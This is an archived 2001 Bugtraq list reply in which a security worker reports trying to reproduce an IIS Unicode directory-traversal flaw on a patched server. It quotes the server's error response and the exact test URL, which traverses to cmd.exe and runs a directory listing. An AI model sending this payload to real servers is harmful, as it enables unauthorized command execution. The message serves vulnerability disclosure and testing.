Re: New vulnerability in IIS4.0/5.0

From: C?sar Gonz?lez (cesar@eureka-sistemas.com)
Date: 09/19/01 

Message-Id: <200109191935.f8JJZ1j15381@bolo.sytes.net>
From: C?sar Gonz?lez <cesar@eureka-sistemas.com>
To: Bugtraq@securityfocus.com
Subject: Re: New vulnerability in IIS4.0/5.0
Date: Wed, 19 Sep 2001 21:34:59 +0200

I am trying to reproduce the UTF vulnerability in one IIS 5.0 with the last
patches applied an it doesnt seem to be affected, but the response of the
server smells like a bug :

Server: Microsoft-IIS/5.0
Date: Wed, 19 Sep 2001 19:17:00 GMT
Content-Type: text/html
Content-Length: 88
 
<html><head><title>Error</title></head><body>The parameter is incorrect.
</body></html>

This is the string used for the test

http://XX.XX.XX.XX/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\

?Anyone with success testing the vulnerability?

Regards,

C?sar Gonz?lez Revilla
Eureka Sistemas S.L.
C/ San Fernando 16 bajo
39010 Santander
SPAIN

http://www.eureka-sistemas.com/

cesar@eureka-sistemas.com

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org
 
mQGiBDsshKoRBADzt7m8nsYJ02l3Vh794IuBQITQ+Ks6anzdKrsAhb2WXoE3eICY
gdi21727h9L4bJAHwBGf0//zTMbKXYSRBfB8qi2LkJpam/zvdGi8jY7VmEiyOSnu
aDhaXzXLY/K9QhVey8IS4N2D/taMYURvxsXdpslfwxKr2+C0gReL487LwwCgxgXo
QZSPhgcqQH2T09bNDQzJWM0EAL5ohJlXoxG2LJKnw+1fRwwGhkHY/m5ZIk6KnPHx
JjBLytAUYuGf+KapDOk1kGBOnnmGNOU/mvBe4/SpsfaIE9Dr1IwT7a566pNUTCjq
SXXTWXbMPfQYg2fxC9Q6BnKY7ksLPes0tM8ZxTYPQbEgGS2kzRwDcNq1gI8df9Ij
NTLdBACQXDy6RlE3Ruqzq2zHvYW5Bw8J0O2A71JUh/+/giF2J36pE4CP5kOQfXGO
WHVf9EQMWRJILjLrYJuxz7MTIoaneLCYsX+pQN85bllBvdBNpXMr6Gfl0/WDz34b
RUYk1sfmfDj+s3bQdzkdUtB0GKHV5wyYXKiWjIufsC4jxizmT7RBQ2VzYXIgR29u
emFsZXogUmV2aWxsYSAoQUtBIEJvbG9Ucm9uKSA8Y2VzYXJAZXVyZWthLXNpc3Rl
bWFzLmNvbT6IVwQTEQIAFwUCOyyEqgULBwoDBAMVAwIDFgIBAheAAAoJEDA5nDye
t7spk5AAnAqy+Yqd8FO/27umg3EvtjGUU+tjAJ9jaRBI1Bc/sb2Nq48+Vp9RT4VI
1rkBDQQ7LIS6EAQAkK3BHsTfJM2PriGBhfkc3UK9pMLMd7hYeRmh8ZW0S3NBwul/
PaD9luVIKRkJLJHElO4E5a4PMu27vBTSqPcdUKy5IeAD42WlaemU4bgTP0wCv7rU
UJCbtaKkpl0m86AGqVBd/0mBwSQUKrcJmMfCskpA2LNUjibOvjPVWjmph8MAAwUD
/1uLj+9Ptkkhuy7LGBfivMIu/DLmvRz4C/fYJi9GtiI2u7Drdb9C3vPop9zTTNWE
5YV3H9oa6E8C/Pp63naT0Y3Nxl+8PJT/QF2BtGEqdaaswy96YL6Rodgdq5YImUIX
szYY1IO8cglMfqsUHHhquZ+Ur9Y0mpPWzUNjls7Nz+M6iEYEGBECAAYFAjsshLoA
CgkQMDmcPJ63uyk4oACfVLdOOcq0Pmp8g4u7nJWNP2kYhJ0An2q7IxBGPnWgXEcD
Q4Qy6O0V86q4
=y6jk
-----END PGP PUBLIC KEY BLOCK-----

Relevant Pages

  • [NT] 15 August 2001 Cumulative Patch for IIS
    ... Microsoft has released an important patch for IIS administrators. ... * A denial of service vulnerability that could enable an attacker to ...
    (Securiteam)
  • SecurityFocus Microsoft Newsletter #82
    ... MICROSOFT VULNERABILITY SUMMARY ... Microsoft IIS HTR ISAPI Extension Buffer Overflow Vulnerability ... Microsoft IIS Help File Search Cross Site Scripting Vulnerability ... CSNews Professional Remote Command Execution Vulnerability ...
    (Focus-Microsoft)
  • [NT] Heap Overrun in HTR Chunked Encoding Could Enable Web Server Compromise
    ... This patch eliminates a newly discovered vulnerability affecting Internet ... in IIS 4.0 and 5.0, and could likewise be used to overrun heap memory on ... allowing code to be run on the server. ... * Microsoft has long recommended disabling HTR functionality unless there ...
    (Securiteam)
  • FW: Microsoft Security Advisory MS 03-007
    ... am trying to find a vulnerability tester/script and I could test it out ... Department of the Army server that had been compromised and that this ... announcement covers IIS 5.1 but not IIS 6, ... How a Hacker Uses SQL Injection to Steal Your SQL Data! ...
    (Focus-Microsoft)
  • [NT] Cumulative Patch for Internet Information Service (28 May 2003)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... security patches released for IIS 4.0 since Windows NT 4.0 Service Pack ... An attacker would need the ability to upload a Server-side ... * A denial of service vulnerability that results because IIS 5.0 and 5.1 ...
    (Securiteam)